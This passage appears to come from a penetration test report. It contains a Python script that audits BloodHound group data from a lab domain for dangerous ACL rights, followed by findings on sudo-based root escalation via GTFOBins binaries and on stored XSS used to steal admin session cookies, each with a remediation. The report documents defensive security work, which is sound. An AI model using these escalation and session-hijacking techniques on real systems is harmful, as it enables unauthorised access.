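          "RightName": "Owns", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-2-3-512",
     "Properties": {"name": "DOMAIN ADMINS@SWEEP.VL", "highvalue": True},
     "Aces": [
         {"PrincipalSID": "S-1-5-21-1-2-3-519", "PrincipalType": "Group",
          "RightName": "GenericAll", "IsInherited": False},
         # hypothetical entry, not from the box: a user with WriteDacl on Domain Admins
         {"PrincipalSID": "S-1-5-21-1-2-3-1125", "PrincipalType": "User",
          "RightName": "WriteDacl", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-2-3-3101",
     "Properties": {"name": "LANSWEEPER DISCOVERY@SWEEP.VL", "highvalue": False}, "Aces": []},
    {"ObjectIdentifier": "S-1-5-21-1-2-3-519",
     "Properties": {"name": "ENTERPRISE ADMINS@SWEEP.VL", "highvalue": True}, "Aces": []},
], "meta": {"type": "groups", "count": 4, "version": 5}})


def audit_group_aces(groups_json: str, trusted=TRUSTED_PRINCIPALS) -> list[dict]:
    """Return dangerous ACEs on groups held by principals outside the trusted set."""
    doc = json.loads(groups_json)
    # Only group names are resolvable from groups.json; other principal types fall back to their SID.
    name_by_sid = {g["ObjectIdentifier"]: g["Properties"]["name"] for g in doc["data"]}
    findings = []
    for g in doc["data"]:
        target = g["Properties"]["name"]
        for ace in g.get("Aces", []):
            if ace["RightName"] not in DANGEROUS_RIGHTS:
                continue
            principal = name_by_sid.get(ace["PrincipalSID"], ace["PrincipalSID"])
            if principal in trusted:
                continue
            findings.append({
                "principal": principal,
                "principal_type": ace["PrincipalType"],
                "right": ace["RightName"],
                "target": target,
                "high_value_target": bool(g["Properties"].get("highvalue")),
                "inherited": ace["IsInherited"],
            })
    # High-value targets first, then alphabetically by target, so the worst paths top the list.
    findings.sort(key=lambda f: (not f["high_value_target"], f["target"], f["principal"]))
    return findings


if __name__ == "__main__":
    for f in audit_group_aces(GROUPS_JSON):
        flag = "HIGH-VALUE " if f["high_value_target"] else ""
        print(f"{flag}{f['principal']} has {f['right']} on {f['target']}")
```

Run against a real collection, load users.json and computers.json into the same name map so user and machine principals resolve, and treat every non-inherited entry as a change to justify or remove; inherited entries point at the parent container's ACL instead.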

F-002 — Sudo Misconfiguration — Root Privilege Escalation
Severity: High (CVSS 7.8)
Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration granted the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality: High | Integrity: High | Availability: High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.

F-003 — Cross-Site Scripting (XSS) — Session Hijacking
Severity: Medium (CVSS 6.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

During the penetration test, it was discovered that the application reflected or stored user-supplied input in HTML responses without applying appropriate context-sensitive output encoding. By injecting JavaScript payload into vulnerable input fields, the malicious script executes in the browser of any user who views the affected page — including administrators — without any interaction beyond viewing the page.

Impact

An attacker can hijack authenticated user sessions by stealing session cookies, capture credentials entered on the affected page, perform actions on behalf of victims using their active session, and redirect users to phishing pages. Where the XSS affects administrator users, complete application account takeover is achievable. During this engagement, a stored XSS payload targeting an administrator triggered session token theft which was used to obtain privileged application access.

Confidentiality: Low | Integrity: Low | Availability: None

Remediation

Apply context-sensitive output encoding for all user-supplied data rendered in HTML — HTML entity encoding for HTML context, JavaScript string escaping for script context, URL encoding for URL attributes. Implement a strict Content Security Policy (CSP) that disables inline script execution and restricts script sources to trusted origins. Set the HttpOnly flag on all session cookies to prevent JavaScript access. Apply the SameSite=Strict cookie attribute to mitigate CSRF-combined XSS chains.